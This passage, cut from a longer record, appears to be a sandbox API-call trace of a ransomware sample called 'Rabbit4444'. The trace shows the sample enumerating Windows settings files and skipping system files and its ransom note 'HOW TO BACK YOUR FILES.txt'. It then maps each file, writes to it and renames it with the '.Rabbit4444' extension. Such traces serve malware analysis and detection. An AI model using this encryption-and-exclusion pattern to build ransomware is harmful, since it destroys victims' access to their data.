(lpString="AAA_SystemSettings_Keyboard_IsShiftLockEnabled.settingcontent-ms") returned 64 [0057.439] lstrlenW (lpString="Rabbit4444") returned 10 [0057.439] lstrcmpiW (lpString1="content-ms", lpString2="Rabbit4444") returned -1 [0057.439] lstrlenW (lpString=".dll") returned 4 [0057.439] lstrcmpiW (lpString1="t-ms", lpString2=".dll") returned 1 [0057.439] lstrlenW (lpString=".lnk") returned 4 [0057.439] lstrcmpiW (lpString1="t-ms", lpString2=".lnk") returned 1 [0057.439] lstrlenW (lpString=".ini") returned 4 [0057.439] lstrcmpiW (lpString1="t-ms", lpString2=".ini") returned 1 [0057.439] lstrlenW (lpString=".sys") returned 4 [0057.439] lstrcmpiW (lpString1="t-ms", lpString2=".sys") returned 1 [0057.439] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\AAA_SystemSettings_Keyboard_IsShiftLockEnabled.settingcontent-ms" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\localstate\\indexed\\settings\\en-us\\aaa_systemsettings_keyboard_isshiftlockenabled.settingcontent-ms"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x278 [0057.440] QueryPerformanceFrequency (in: lpFrequency=0x130bfb8 | out: lpFrequency=0x130bfb8*=100000000) returned 1 [0057.440] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc0 | out: lpPerformanceCount=0x130bfc0*=14875044063) returned 1 [0057.440] GetFileSizeEx (in: hFile=0x278, lpFileSize=0x130c018 | out: lpFileSize=0x130c018*=1279) returned 1 [0057.440] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x6c) returned 0x1176f8 [0057.440] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x80) returned 0x101408 [0057.440] CreateFileMappingW (hFile=0x278, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x800, lpName=0x0) returned 0x298 [0057.441] MapViewOfFile (hFileMappingObject=0x298, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x800) returned 0x70000 [0057.442] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x100) returned 0x124d90 [0057.442] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x108df8 [0057.442] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x124d90 | out: hHeap=0xe0000) returned 1 [0057.442] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x1095a0 [0057.442] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x208) returned 0x124d90 [0057.442] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1095a0 | out: hHeap=0xe0000) returned 1 [0057.442] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x124d90 | out: hHeap=0xe0000) returned 1 [0057.442] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x108df8 | out: hHeap=0xe0000) returned 1 [0057.442] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc8 | out: lpPerformanceCount=0x130bfc8*=14875292385) returned 1 [0057.442] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1176f8 | out: hHeap=0xe0000) returned 1 [0057.442] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x101408 | out: hHeap=0xe0000) returned 1 [0057.442] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0057.442] CloseHandle (hObject=0x298) returned 1 [0057.443] CloseHandle (hObject=0x278) returned 1 [0057.443] wsprintfW (in: param_1=0x130c2c8, param_2="%s.%s" | out: param_1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\AAA_SystemSettings_Keyboard_IsShiftLockEnabled.settingcontent-ms.Rabbit4444") returned 192 [0057.443] MoveFileExW (lpExistingFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\AAA_SystemSettings_Keyboard_IsShiftLockEnabled.settingcontent-ms" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\localstate\\indexed\\settings\\en-us\\aaa_systemsettings_keyboard_isshiftlockenabled.settingcontent-ms"), lpNewFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\AAA_SystemSettings_Keyboard_IsShiftLockEnabled.settingcontent-ms.Rabbit4444" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\localstate\\indexed\\settings\\en-us\\aaa_systemsettings_keyboard_isshiftlockenabled.settingcontent-ms.rabbit4444"), dwFlags=0x1) returned 1 [0057.443] FindNextFileW (in: hFindFile=0x102510, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2e06a775, ftCreationTime.dwHighDateTime=0x1d32715, ftLastAccessTime.dwLowDateTime=0x2e06a775, ftLastAccessTime.dwHighDateTime=0x1d32715, ftLastWriteTime.dwLowDateTime=0x2394398e, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x510, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="AAA_SystemSettings_Keyboard_IsSpellcheckingEnabled.settingcontent-ms", cAlternateFileName="AA2897~1.SET")) returned 1 [0057.443] lstrcmpiW (lpString1="AAA_SystemSettings_Keyboard_IsSpellcheckingEnabled.settingcontent-ms", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0057.443] lstrcmpiW (lpString1="AAA_SystemSettings_Keyboard_IsSpellcheckingEnabled.settingcontent-ms", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0057.443] lstrcmpiW (lpString1="AAA_SystemSettings_Keyboard_IsSpellcheckingEnabled.settingcontent-ms", lpString2="Rabbit4444.exe") returned -1 [0057.443] lstrcmpiW (lpString1="AAA_SystemSettings_Keyboard_IsSpellcheckingEnabled.settingcontent-ms", lpString2=".") returned 1 [0057.444] lstrcmpiW (lpString1="AAA_SystemSettings_Keyboard_IsSpellcheckingEnabled.settingcontent-ms", lpString2="..") returned 1 [0057.444] lstrcmpiW (lpString1="AAA_SystemSettings_Keyboard_IsSpellcheckingEnabled.settingcontent-ms", lpString2="windows") returned -1 [0057.444] lstrcmpiW (lpString1="AAA_SystemSettings_Keyboard_IsSpellcheckingEnabled.settingcontent-ms", lpString2="bootmgr") returned -1 [0057.444] lstrcmpiW (lpString1="AAA_SystemSettings_Keyboard_IsSpellcheckingEnabled.settingcontent-ms", lpString2="pagefile.sys") returned -1 [0057.444] lstrcmpiW (lpString1="AAA_SystemSettings_Keyboard_IsSpellcheckingEnabled.settingcontent-ms", lpString2="boot") returned -1 [0057.444] lstrcmpiW (lpString1="AAA_SystemSettings_Keyboard_IsSpellcheckingEnabled.settingcontent-ms", lpString2="ids.txt") returned -1 [0057.444] lstrcmpiW (lpString1="AAA_SystemSettings_Keyboard_IsSpellcheckingEnabled.settingcontent-ms", lpString2="NTUSER.DAT") returned -1 [0057.444] lstrcpyW (in: lpString1=0x130ec22, lpString2="AAA_SystemSettings_Keyboard_IsSpellcheckingEnabled.settingcontent-ms" | out: lpString1="AAA_SystemSettings_Keyboard_IsSpellcheckingEnabled.settingcontent-ms") returned="AAA_SystemSettings_Keyboard_IsSpellcheckingEnabled.settingcontent-ms" [0057.444] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\AAA_SystemSettings_Keyboard_IsSpellcheckingEnabled.settingcontent-ms", dwFileAttributes=0x0) returned 1 [0057.444] lstrlenW (lpString="AAA_SystemSettings_Keyboard_IsSpellcheckingEnabled.settingcontent-ms") returned 68 [0057.444] lstrlenW (lpString="Rabbit4444") returned 10 [0057.444] lstrcmpiW (lpString1="content-ms", lpString2="Rabbit4444") returned -1 [0057.444] lstrlenW (lpString=".dll") returned 4 [0057.444] lstrcmpiW (lpString1="t-ms", lpString2=".dll") returned 1 [0057.444] lstrlenW (lpString=".lnk") returned 4 [0057.444] lstrcmpiW (lpString1="t-ms", lpString2=".lnk") returned 1 [0057.444] lstrlenW (lpString=".ini") returned 4 [0057.444] lstrcmpiW (lpString1="t-ms", lpString2=".ini") returned 1 [0057.444] lstrlenW (lpString=".sys") returned 4 [0057.444] lstrcmpiW (lpString1="t-ms", lpString2=".sys") returned 1 [0057.444] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\AAA_SystemSettings_Keyboard_IsSpellcheckingEnabled.settingcontent-ms" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\localstate\\indexed\\settings\\en-us\\aaa_systemsettings_keyboard_isspellcheckingenabled.settingcontent-ms"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x278 [0057.445] QueryPerformanceFrequency (in: lpFrequency=0x130bfb8 | out: lpFrequency=0x130bfb8*=100000000) returned 1 [0057.445] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc0 | out: lpPerformanceCount=0x130bfc0*=14875532239) returned 1 [0057.445] GetFileSizeEx (in: hFile=0x278, lpFileSize=0x130c018 | out: lpFileSize=0x130c018*=1296) returned 1 [0057.445] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x6c) returned 0x1176f8 [0057.445] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x80) returned 0x101c88 [0057.445] CreateFileMappingW (hFile=0x278, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x810, lpName=0x0) returned 0x298 [0057.446] MapViewOfFile (hFileMappingObject=0x298, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x810) returned 0x70000 [0057.447] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x100) returned 0x124d90 [0057.447] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x1097d0 [0057.447] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x124d90 | out: hHeap=0xe0000) returned 1 [0057.447] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x108ce0 [0057.447] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x208) returned 0x124d90 [0057.447] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x108ce0 | out: hHeap=0xe0000) returned 1 [0057.447] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x124d90 | out: hHeap=0xe0000) returned 1 [0057.447] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1097d0 | out: hHeap=0xe0000) returned 1 [0057.447] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc8 | out: lpPerformanceCount=0x130bfc8*=14875797657) returned 1 [0057.447] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1176f8 | out: hHeap=0xe0000) returned 1 [0057.447] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x101c88 | out: hHeap=0xe0000) returned 1 [0057.447] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0057.447] CloseHandle (hObject=0x298) returned 1 [0057.447] CloseHandle (hObject=0x278) returned 1 [0057.448] wsprintfW (in: param_1=0x130c2c8, param_2="%s.%s" | out: param_1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\AAA_SystemSettings_Keyboard_IsSpellcheckingEnabled.settingcontent-ms.Rabbit4444") returned 196 [0057.448] MoveFileExW (lpExistingFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\AAA_SystemSettings_Keyboard_IsSpellcheckingEnabled.settingcontent-ms" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\localstate\\indexed\\settings\\en-us\\aaa_systemsettings_keyboard_isspellcheckingenabled.settingcontent-ms"), lpNewFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\AAA_SystemSettings_Keyboard_IsSpellcheckingEnabled.settingcontent-ms.Rabbit4444" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\localstate\\indexed\\settings\\en-us\\aaa_systemsettings_keyboard_isspellcheckingenabled.settingcontent-ms.rabbit4444"), dwFlags=0x1) returned 1 [0057.448] FindNextFileW (in: hFindFile=0x102510, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2e1c1c8f, ftCreationTime.dwHighDateTime=0x1d32715, ftLastAccessTime.dwLowDateTime=0x2e1c1c8f, ftLastAccessTime.dwHighDateTime=0x1d32715, ftLastWriteTime.dwLowDateTime=0x239dc2f0, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x519, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="AAA_SystemSettings_Keyboard_IsTextPredictionEnabled.settingcontent-ms", cAlternateFileName="AAC8EF~1.SET")) returned 1 [0057.448] lstrcmpiW (lpString1="AAA_SystemSettings_Keyboard_IsTextPredictionEnabled.settingcontent-ms", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0057.449] lstrcmpiW (lpString1="AAA_SystemSettings_Keyboard_IsTextPredictionEnabled.settingcontent-ms", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0057.449] lstrcmpiW (lpString1="AAA_SystemSettings_Keyboard_IsTextPredictionEnabled.settingcontent-ms", lpString2="Rabbit4444.exe") returned -1 [0057.449] lstrcmpiW (lpString1="AAA_SystemSettings_Keyboard_IsTextPredictionEnabled.settingcontent-ms", lpString2=".") returned 1 [0057.449] lstrcmpiW (lpString1="AAA_SystemSettings_Keyboard_IsTextPredictionEnabled.settingcontent-ms", lpString2="..") returned 1 [0057.449] lstrcmpiW (lpString1="AAA_SystemSettings_Keyboard_IsTextPredictionEnabled.settingcontent-ms", lpString2="windows") returned -1 [0057.449] lstrcmpiW (lpString1="AAA_SystemSettings_Keyboard_IsTextPredictionEnabled.settingcontent-ms", lpString2="bootmgr") returned -1 [0057.449] lstrcmpiW (lpString1="AAA_SystemSettings_Keyboard_IsTextPredictionEnabled.settingcontent-ms", lpString2="pagefile.sys") returned -1 [0057.449] lstrcmpiW (lpString1="AAA_SystemSettings_Keyboard_IsTextPredictionEnabled.settingcontent-ms", lpString2="boot") returned -1 [0057.449] lstrcmpiW (lpString1="AAA_SystemSettings_Keyboard_IsTextPredictionEnabled.settingcontent-ms", lpString2="ids.txt") returned -1 [0057.449] lstrcmpiW (lpString1="AAA_SystemSettings_Keyboard_IsTextPredictionEnabled.settingcontent-ms", lpString2="NTUSER.DAT") returned -1 [0057.449] lstrcpyW (in: lpString1=0x130ec22, lpString2="AAA_SystemSettings_Keyboard_IsTextPredictionEnabled.settingcontent-ms" | out: lpString1="AAA_SystemSettings_Keyboard_IsTextPredictionEnabled.settingcontent-ms") returned="AAA_SystemSettings_Keyboard_IsTextPredictionEnabled.settingcontent-ms" [0057.449] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\AAA_SystemSettings_Keyboard_IsTextPredictionEnabled.settingcontent-ms", dwFileAttributes=0x0) returned 1 [0057.449] lstrlenW (lpString="AAA_SystemSettings_Keyboard_IsTextPredictionEnabled.settingcontent-ms") returned 69 [0057.449] lstrlenW (lpString="Rabbit4444") returned 10 [0057.449] lstrcmpiW (lpString1="content-ms", lpString2="Rabbit4444") returned -1 [0057.449] lstrlenW (lpString=".dll") returned 4 [0057.449] lstrcmpiW (lpString1="t-ms", lpString2=".dll") returned 1 [0057.449] lstrlenW (lpString=".lnk") returned 4 [0057.449] lstrcmpiW (lpString1="t-ms", lpString2=".lnk") returned 1 [0057.449] lstrlenW (lpString=".ini") returned 4 [0057.449] lstrcmpiW (lpString1="t-ms", lpString2=".ini") returned 1 [0057.449] lstrlenW (lpString=".sys") returned 4 [0057.449] lstrcmpiW (lpString1="t-ms", lpString2=".sys") returned 1 [0057.449] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\AAA_SystemSettings_Keyboard_IsTextPredictionEnabled.settingcontent-ms" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\localstate\\indexed\\settings\\en-us\\aaa_systemsettings_keyboard_istextpredictionenabled.settingcontent-ms"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x278 [0057.450] QueryPerformanceFrequency (in: lpFrequency=0x130bfb8 | out: lpFrequency=0x130bfb8*=100000000) returned 1 [0057.450] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc0 | out: lpPerformanceCount=0x130bfc0*=14876047059) returned 1 [0057.450] GetFileSizeEx (in: hFile=0x278, lpFileSize=0x130c018 | out: lpFileSize=0x130c018*=1305) returned 1 [0057.450] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x6c) returned 0x117b30 [0057.450] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x80) returned 0x101c00 [0057.450] CreateFileMappingW (hFile=0x278, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x820, lpName=0x0) returned 0x298 [0057.451] MapViewOfFile (hFileMappingObject=0x298, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x820) returned 0x70000 [0057.452] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x100) returned 0x124d90 [0057.452] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x1098e8 [0057.452] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x124d90 | out: hHeap=0xe0000) returned 1 [0057.452] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x108f10 [0057.452] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x208) returned 0x124d90 [0057.452] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x108f10 | out: hHeap=0xe0000) returned 1 [0057.452] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x124d90 | out: hHeap=0xe0000) returned 1 [0057.452] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1098e8 | out: hHeap=0xe0000) returned 1 [0057.453] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc8 | out: lpPerformanceCount=0x130bfc8*=14876327723) returned 1 [0057.453] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x117b30 | out: hHeap=0xe0000) returned 1 [0057.453] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x101c00 | out: hHeap=0xe0000) returned 1 [0057.453] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0057.453] CloseHandle (hObject=0x298) returned 1 [0057.453] CloseHandle (hObject=0x278) returned 1 [0057.453] wsprintfW (in: param_1=0x130c2c8, param_2="%s.%s" | out: param_1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\AAA_SystemSettings_Keyboard_IsTextPredictionEnabled.settingcontent-ms.Rabbit4444") returned 197 [0057.453] MoveFileExW (lpExistingFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\AAA_SystemSettings_Keyboard_IsTextPredictionEnabled.settingcontent-ms" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\localstate\\indexed\\settings\\en-us\\aaa_systemsettings_keyboard_istextpredictionenabled.settingcontent-ms"), lpNewFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\AAA_SystemSettings_Keyboard_IsTextPredictionEnabled.settingcontent-ms.Rabbit4444" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\localstate\\indexed\\settings\\en-us\\aaa_systemsettings_keyboard_istextpredictionenabled.settingcontent-ms.rabbit4444"), dwFlags=0x1) returned 1 [0057.454] FindNextFileW (in: hFindFile=0x102510, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2e31916d, ftCreationTime.dwHighDateTime=0x1d32715, ftLastAccessTime.dwLowDateTime=0x2e31916d, ftLastAccessTime.dwHighDateTime=0x1d32715, ftLastWriteTime.dwLowDateTime=0x239b6099, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x4d9, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="AAA_SystemSettings_Language_Add_Profile.settingcontent-ms", cAlternateFileName="AAEB7A~1.SET")) returned 1 [0057.454] lstrcmpiW (lpString1="AAA_SystemSettings_Language_Add_Profile.settingcontent-ms", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0057.454] lstrcmpiW (lpString1="AAA_SystemSettings_Language_Add_Profile.settingcontent-ms", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0057.454] lstrcmpiW (lpString1="AAA_SystemSettings_Language_Add_Profile.settingcontent-ms", lpString2="Rabbit4444.exe") returned -1 [0057.454] lstrcmpiW (lpString1="AAA_SystemSettings_Language_Add_Profile.settingcontent-ms", lpString2=".") returned 1 [0057.454] lstrcmpiW (lpString1="AAA_SystemSettings_Language_Add_Profile.settingcontent-ms", lpString2="..") returned 1 [0057.454] lstrcmpiW (lpString1="AAA_SystemSettings_Language_Add_Profile.settingcontent-ms", lpString2="windows") returned -1 [0057.454] lstrcmpiW (lpString1="AAA_SystemSettings_Language_Add_Profile.settingcontent-ms", lpString2="bootmgr") returned -1 [0057.454] lstrcmpiW (lpString1="AAA_SystemSettings_Language_Add_Profile.settingcontent-ms", lpString2="pagefile.sys") returned -1 [0057.454] lstrcmpiW (lpString1="AAA_SystemSettings_Language_Add_Profile.settingcontent-ms", lpString2="boot") returned -1 [0057.454] lstrcmpiW (lpString1="AAA_SystemSettings_Language_Add_Profile.settingcontent-ms", lpString2="ids.txt") returned -1 [0057.454] lstrcmpiW (lpString1="AAA_SystemSettings_Language_Add_Profile.settingcontent-ms", lpString2="NTUSER.DAT") returned -1 [0057.454] lstrcpyW (in: lpString1=0x130ec22, lpString2="AAA_SystemSettings_Language_Add_Profile.settingcontent-ms" | out: lpString1="AAA_SystemSettings_Language_Add_Profile.settingcontent-ms") returned="AAA_SystemSettings_Language_Add_Profile.settingcontent-ms" [0057.454] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\AAA_SystemSettings_Language_Add_Profile.settingcontent-ms", dwFileAttributes=0x0) returned 1 [0057.454] lstrlenW (lpString="AAA_SystemSettings_Language_Add_Profile.settingcontent-ms") returned 57 [0057.454] lstrlenW (lpString="Rabbit4444") returned 10 [0057.454] lstrcmpiW (lpString1="content-ms", lpString2="Rabbit4444") returned -1 [0057.454] lstrlenW (lpString=".dll") returned 4 [0057.454] lstrcmpiW (lpString1="t-ms", lpString2=".dll") returned 1 [0057.455] lstrlenW (lpString=".lnk") returned 4 [0057.455] lstrcmpiW (lpString1="t-ms", lpString2=".lnk") returned 1 [0057.455] lstrlenW (lpString=".ini") returned 4 [0057.455] lstrcmpiW (lpString1="t-ms", lpString2=".ini") returned 1 [0057.455] lstrlenW (lpString=".sys") returned 4 [0057.455] lstrcmpiW (lpString1="t-ms", lpString2=".sys") returned 1 [0057.455] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\AAA_SystemSettings_Language_Add_Profile.settingcontent-ms" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\localstate\\indexed\\settings\\en-us\\aaa_systemsettings_language_add_profile.settingcontent-ms"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x278 [0057.455] QueryPerformanceFrequency (in: lpFrequency=0x130bfb8 | out: lpFrequency=0x130bfb8*=100000000) returned 1 [0057.455] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc0 | out: lpPerformanceCount=0x130bfc0*=14876593942) returned 1 [0057.455] GetFileSizeEx (in: hFile=0x278, lpFileSize=0x130c018 | out: lpFileSize=0x130c018*=1241) returned 1 [0057.455] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x6c) returned 0x117c98 [0057.455] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x80) returned 0x1019e0 [0057.455] CreateFileMappingW (hFile=0x278, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x7e0, lpName=0x0) returned 0x298 [0057.458] MapViewOfFile (hFileMappingObject=0x298, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x7e0) returned 0x70000 [0057.459] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x100) returned 0x124d90 [0057.459] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x108bc8 [0057.459] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x124d90 | out: hHeap=0xe0000) returned 1 [0057.459] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x109370 [0057.459] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x208) returned 0x124d90 [0057.459] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x109370 | out: hHeap=0xe0000) returned 1 [0057.459] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x124d90 | out: hHeap=0xe0000) returned 1 [0057.459] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x108bc8 | out: hHeap=0xe0000) returned 1 [0057.459] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc8 | out: lpPerformanceCount=0x130bfc8*=14877018832) returned 1 [0057.459] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x117c98 | out: hHeap=0xe0000) returned 1 [0057.460] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1019e0 | out: hHeap=0xe0000) returned 1 [0057.460] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0057.460] CloseHandle (hObject=0x298) returned 1 [0057.460] CloseHandle (hObject=0x278) returned 1 [0057.460] wsprintfW (in: param_1=0x130c2c8, param_2="%s.%s" | out: param_1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\AAA_SystemSettings_Language_Add_Profile.settingcontent-ms.Rabbit4444") returned 185 [0057.460] MoveFileExW (lpExistingFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\AAA_SystemSettings_Language_Add_Profile.settingcontent-ms" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\localstate\\indexed\\settings\\en-us\\aaa_systemsettings_language_add_profile.settingcontent-ms"), 